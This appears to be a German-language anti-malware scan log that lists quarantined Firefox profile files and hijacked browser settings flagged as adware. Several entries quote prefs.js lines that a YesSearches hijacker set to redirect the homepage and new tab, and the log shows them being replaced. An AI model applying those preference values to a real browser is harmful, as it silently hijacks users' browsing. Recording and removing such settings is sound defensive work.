PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\background, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\search, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\reports, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\unit, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\de, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\es, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\fr, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\it, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\pt_BR, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\minidumps, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\saved-telemetry-pings, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\sessionstore-backups, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb\2918063365piupsah.files, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\webapps, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],

Dateien: 195
PUP.Optional.WindowsProtectManager, C:\ProgramData\FwinpF\WFini.exe, In Quarantäne, [11945062475290a6ccadae8c17ee21df],
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (user_pref("browser.newtab.url", "hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffseng");), Ersetzt,[8520ddd57029bb7b95b33340d62ffa06]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (p.update.lastUpdateTime.browser-cleanup-thumbnails", 1445874268);
user_pref("app.update.lastUpdateTime.experiments-update-timer", 1445874508);
user_pref("app.update.), Ersetzt,[267f0ca63762a78f1a2edd9620e527d9]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (hile the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_), Ersetzt,[1293b5fd2a6f95a1cc7c6112a5604ab6]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (nning,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref("accessibility.typeahe), Ersetzt,[c8dddbd7c5d470c66adeb5be8283966a]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (ref("app.update.lastUpdateTime.addon-background-update-timer", 1445874628);
user_pref("app.update.lastUpdateTime.background-update-timer", 1445874868);
user), Ersetzt,[4d58337f5b3ee94d2a1ec1b2f411f709]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (user_pref("browser.startup.homepage", "https://www.malwarebytes.org/restorebrowser/), Schlecht: (user_pref("browser.startup.homepage", "hxxp://www.yessearches.com), Ersetzt,[1293cce6019881b51949d69d37ce7e82]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins\DD1B66D4.xml, In Quarantäne, [0b9a0ea42376f73f06261161ce377090],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\logins.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\absLocalStorage.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\addons.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\blocklist.xml, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\cert8.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\compatibility.ini, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\content-prefs.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\DCYoabp08X_ff.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions.ini, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\formhistory.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\key3.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\mimeTypes.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\parent.lock, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\permissions.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\places.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\pluginreg.dat, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\revocations.txt, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\search-metadata.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\secmod.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\SiteSecurityServiceState.txt, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\times.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\xulstore.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\bookmarkbackups\bookmarks-2015-08-02_14_vyI8dWcKHj7dD5pvymndCA==.jsonlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes\store.json.mozlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\state.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived\2015-10\1445874084771.eb83a39e-2542-4b9b-8f15-92b074184ca6.crash.jsonlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\bootstrap.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\install.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\manifest.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\update.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\app.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\blocked.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\content.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\search.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\base\search.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\ask.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\duckduckgo.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\google.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Bold.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Bold.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Light.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Light.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_diagonals-thick_18_b81900_40x40.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_diagonals-thick_20_666666_40x40.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_flat_10_000000_40x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_100_f6f6f6_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_100_fdf5ce_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_65_ffffff_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_gloss-wave_35_f6a828_500x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_highlight-soft_100_eeeeee_1x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_highlight-soft_75_ffe45c_1x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_222222_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_228ef1_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ef8c08_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ffd27a_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ffffff_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\dnt-api\background.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\blocked.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\locale.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\top.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Alien.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
